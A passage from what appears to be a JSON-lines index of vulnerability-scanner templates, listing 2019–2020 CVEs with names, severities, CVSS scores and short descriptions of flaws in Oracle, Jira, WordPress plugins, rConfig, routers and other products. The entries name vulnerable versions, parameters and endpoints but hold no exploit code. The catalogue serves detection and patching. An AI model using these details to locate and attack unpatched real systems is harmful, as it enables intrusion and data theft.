This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-19824.yaml"} +{"ID":"CVE-2019-19908","Info":{"Name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","Severity":"medium","Description":"phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-19908.yaml"} +{"ID":"CVE-2019-19985","Info":{"Name":"WordPress Email Subscribers \u0026 Newsletters \u003c4.2.2 - Arbitrary File Retrieval","Severity":"medium","Description":"The WordPress plugin Email Subscribers \u0026 Newsletters before 4.2.3 contains a flaw that allows unauthenticated file download and user information disclosure.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-19985.yaml"} +{"ID":"CVE-2019-20085","Info":{"Name":"TVT NVMS 1000 - Local File Inclusion","Severity":"high","Description":"TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-20085.yaml"} +{"ID":"CVE-2019-20141","Info":{"Name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-20141.yaml"} +{"ID":"CVE-2019-20183","Info":{"Name":"Simple Employee Records System 1.0 - Unrestricted File Upload","Severity":"high","Description":"Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-20183.yaml"} +{"ID":"CVE-2019-20210","Info":{"Name":"WordPress CTHthemes - Cross-Site Scripting","Severity":"medium","Description":"WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-20210.yaml"} +{"ID":"CVE-2019-20224","Info":{"Name":"Pandora FMS 7.0NG - Remote Command Injection","Severity":"high","Description":"Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-20224.yaml"} +{"ID":"CVE-2019-20933","Info":{"Name":"Authentication Bypass InfluxDB","Severity":"critical","Description":"InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-20933.yaml"} +{"ID":"CVE-2019-2578","Info":{"Name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control","Severity":"high","Description":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2019/CVE-2019-2578.yaml"} +{"ID":"CVE-2019-2579","Info":{"Name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","Severity":"medium","Description":"The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2019/CVE-2019-2579.yaml"} +{"ID":"CVE-2019-2588","Info":{"Name":"Oracle Business Intelligence - Path Traversal","Severity":"medium","Description":"Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security).\n","Classification":{"CVSSScore":"4.9"}},"file_path":"cves/2019/CVE-2019-2588.yaml"} +{"ID":"CVE-2019-2616","Info":{"Name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","Severity":"high","Description":"Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-2616.yaml"} +{"ID":"CVE-2019-2725","Info":{"Name":"Oracle WebLogic Server - Remote Command Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-2725.yaml"} +{"ID":"CVE-2019-2729","Info":{"Name":"Oracle WebLogic Server Administration Console - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-2729.yaml"} +{"ID":"CVE-2019-2767","Info":{"Name":"Oracle Business Intelligence Publisher - XML External Entity Injection","Severity":"high","Description":"Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-2767.yaml"} +{"ID":"CVE-2019-3396","Info":{"Name":"Atlassian Confluence Server - Path Traversal","Severity":"critical","Description":"The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-3396.yaml"} +{"ID":"CVE-2019-3401","Info":{"Name":"Atlassian JIRA Information Exposure (CVE-2019-3401)","Severity":"medium","Description":"The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-3401.yaml"} +{"ID":"CVE-2019-3402","Info":{"Name":"Jira \u003c 8.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-3402.yaml"} +{"ID":"CVE-2019-3403","Info":{"Name":"User enumeration via an incorrect authorisation check","Severity":"medium","Description":"The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-3403.yaml"} +{"ID":"CVE-2019-3799","Info":{"Name":"Spring Cloud Config Server - Local File Inclusion","Severity":"medium","Description":"Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-3799.yaml"} +{"ID":"CVE-2019-3911","Info":{"Name":"LabKey Server Community Edition \u003c18.3.0 - Cross-Site Scripting","Severity":"medium","Description":"LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-3911.yaml"} +{"ID":"CVE-2019-3912","Info":{"Name":"LabKey Server Community Edition \u003c18.3.0 - Open Redirect","Severity":"medium","Description":"LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-3912.yaml"} +{"ID":"CVE-2019-3929","Info":{"Name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","Severity":"critical","Description":"The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-3929.yaml"} +{"ID":"CVE-2019-5127","Info":{"Name":"YouPHPTube Encoder 2.3 - Remote Command Injection","Severity":"critical","Description":"YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-5127.yaml"} +{"ID":"CVE-2019-5418","Info":{"Name":"Rails File Content Disclosure","Severity":"high","Description":"Rails \u003c5.2.2.1, \u003c5.1.6.2, \u003c5.0.7.2, \u003c4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-5418.yaml"} +{"ID":"CVE-2019-6112","Info":{"Name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-6112.yaml"} +{"ID":"CVE-2019-6340","Info":{"Name":"Drupal - Remote Code Execution","Severity":"high","Description":"Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2019/CVE-2019-6340.yaml"} +{"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-6715.yaml"} +{"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver 1.2.5 - CRLF Injection","Severity":"medium","Description":"CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-6802.yaml"} +{"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-7219.yaml"} +{"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-7238.yaml"} +{"ID":"CVE-2019-7254","Info":{"Name":"eMerge E3 1.00-06 - Local File Inclusion","Severity":"high","Description":"Linear eMerge E3-Series devices are vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-7254.yaml"} +{"ID":"CVE-2019-7255","Info":{"Name":"Linear eMerge E3 - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-7255.yaml"} +{"ID":"CVE-2019-7256","Info":{"Name":"eMerge E3 1.00-06 - Remote Code Execution","Severity":"critical","Description":"Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2019/CVE-2019-7256.yaml"} +{"ID":"CVE-2019-7275","Info":{"Name":"Optergy Proton/Enterprise Building Management System - Open Redirect","Severity":"medium","Description":"Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-7275.yaml"} +{"ID":"CVE-2019-7315","Info":{"Name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","Severity":"high","Description":"Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-7315.yaml"} +{"ID":"CVE-2019-7481","Info":{"Name":"SonicWall SRA 4600 VPN - SQL Injection","Severity":"high","Description":"The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-7481.yaml"} +{"ID":"CVE-2019-7543","Info":{"Name":"KindEditor 4.1.11 - Cross-Site Scripting","Severity":"medium","Description":"KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-7543.yaml"} +{"ID":"CVE-2019-7609","Info":{"Name":"Kibana Timelion - Arbitrary Code Execution","Severity":"critical","Description":"Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2019/CVE-2019-7609.yaml"} +{"ID":"CVE-2019-8086","Info":{"Name":"Adobe Experience Manager XXE","Severity":"high","Description":"Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-8086.yaml"} +{"ID":"CVE-2019-8442","Info":{"Name":"Jira - Local File Inclusion","Severity":"high","Description":"Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-8442.yaml"} +{"ID":"CVE-2019-8446","Info":{"Name":"Jira Improper Authorization","Severity":"medium","Description":"The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-8446.yaml"} +{"ID":"CVE-2019-8449","Info":{"Name":"JIRA Unauthenticated Sensitive Information Disclosure","Severity":"medium","Description":"The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-8449.yaml"} +{"ID":"CVE-2019-8451","Info":{"Name":"JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource","Severity":"medium","Description":"The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-8451.yaml"} +{"ID":"CVE-2019-8903","Info":{"Name":"Totaljs \u003c3.2.3 - Local File Inclusion","Severity":"high","Description":"Total.js Platform before 3.2.3 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-8903.yaml"} +{"ID":"CVE-2019-8937","Info":{"Name":"HotelDruid 2.3.0 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-8937.yaml"} +{"ID":"CVE-2019-8982","Info":{"Name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent\u0026inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2019/CVE-2019-8982.yaml"} +{"ID":"CVE-2019-9041","Info":{"Name":"ZZZCMS 1.6.1 - Remote Code Execution","Severity":"high","Description":"ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-9041.yaml"} +{"ID":"CVE-2019-9618","Info":{"Name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","Severity":"critical","Description":"WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-9618.yaml"} +{"ID":"CVE-2019-9670","Info":{"Name":"Synacor Zimbra Collaboration \u003c8.7.11p10 - XML External Entity Injection","Severity":"critical","Description":"Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-9670.yaml"} +{"ID":"CVE-2019-9726","Info":{"Name":"Homematic CCU3 - Local File Inclusion","Severity":"high","Description":"eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-9726.yaml"} +{"ID":"CVE-2019-9733","Info":{"Name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","Severity":"critical","Description":"JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-9733.yaml"} +{"ID":"CVE-2019-9915","Info":{"Name":"GetSimple CMS 3.3.13 - Open Redirect","Severity":"medium","Description":"GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-9915.yaml"} +{"ID":"CVE-2019-9922","Info":{"Name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","Severity":"high","Description":"Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-9922.yaml"} +{"ID":"CVE-2019-9955","Info":{"Name":"Zyxel - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-9955.yaml"} +{"ID":"CVE-2019-9978","Info":{"Name":"WordPress Social Warfare \u003c3.5.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-9978.yaml"} +{"ID":"CVE-2020-0618","Info":{"Name":"Microsoft SQL Server Reporting Services - Remote Code Execution","Severity":"high","Description":"Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-0618.yaml"} +{"ID":"CVE-2020-10148","Info":{"Name":"SolarWinds Orion API - Auth Bypass","Severity":"critical","Description":"SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-10148.yaml"} +{"ID":"CVE-2020-10546","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-10546.yaml"} +{"ID":"CVE-2020-10547","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-10547.yaml"} +{"ID":"CVE-2020-10548","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-10548.yaml"} +{"ID":"CVE-2020-10549","Info":{"Name":"rConfig \u003c=3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-10549.yaml"} +{"ID":"CVE-2020-10770","Info":{"Name":"Keycloak 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","Severity":"medium","Description":"Keycloak 12.0.1 and below allow an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-10770.yaml"} +{"ID":"CVE-2020-10973","Info":{"Name":"Wavlink WN530HG4 - Access Control","Severity":"high","Description":"An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-10973.yaml"} +{"ID":"CVE-2020-11034","Info":{"Name":"GLPI \u003c9.4.6 - Open Redirect","Severity":"medium","Description":"GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-11034.yaml"} +{"ID":"CVE-2020-11110","Info":{"Name":"Grafana \u003c=6.7.1 - Cross-Site Scripting","Severity":"medium","Description":"Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-11110.yaml"} +{"ID":"CVE-2020-11450","Info":{"Name":"Microstrategy Web 10.4 exposes the JVM configuration","Severity":"high","Description":"Microstrategy Web 10.4 exposes the JVM configuration, CPU architecture,\ninstallation folder, and other information through the URL /MicroStrategyWS/happyaxis.jsp.\nAn attacker could use this vulnerability to learn more about the environment the\napplication is running in. This issue has been mitigated in all versions of the\nproduct 11.0 and higher.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-11450.yaml"} +{"ID":"CVE-2020-11455","Info":{"Name":"LimeSurvey 4.1.11 - Local File Inclusion","Severity":"critical","Description":"LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-11455.yaml"} +{"ID":"CVE-2020-11529","Info":{"Name":"Grav \u003c1.7 - Open Redirect","Severity":"medium","Description":"Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-11529.yaml"} +{"ID":"CVE-2020-11546","Info":{"Name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","Severity":"critical","Description":"SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-11546.yaml"} +{"ID":"CVE-2020-11547","Info":{"Name":"PRTG Network Monitor \u003c 20.1.57.1745 - Information Disclosure","Severity":"medium","Description":"PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-11547.yaml"} +{"ID":"CVE-2020-11710","Info":{"Name":"Kong Admin \u003c=2.03 - Admin API Access","Severity":"critical","Description":"Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-11710.yaml"} +{"ID":"CVE-2020-11738","Info":{"Name":"WordPress Duplicator 1.3.24 \u0026 1.3.26 - Local File Inclusion","Severity":"high","Description":"WordPress Duplicator 1.3.24 \u0026 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two\nversions v1.3.24 and v1.3.26, the vulnerability wasn't\npresent in versions 1.3.22 and before.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-11738.yaml"} +{"ID":"CVE-2020-11853","Info":{"Name":"Micro Focus Operations Bridge Manager \u003c=2020.05 - Remote Code Execution","Severity":"high","Description":"Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654).\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-11853.yaml"} +{"ID":"CVE-2020-11854","Info":{"Name":"Micro Focus UCMDB - Remote Code Execution","Severity":"critical","Description":"Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 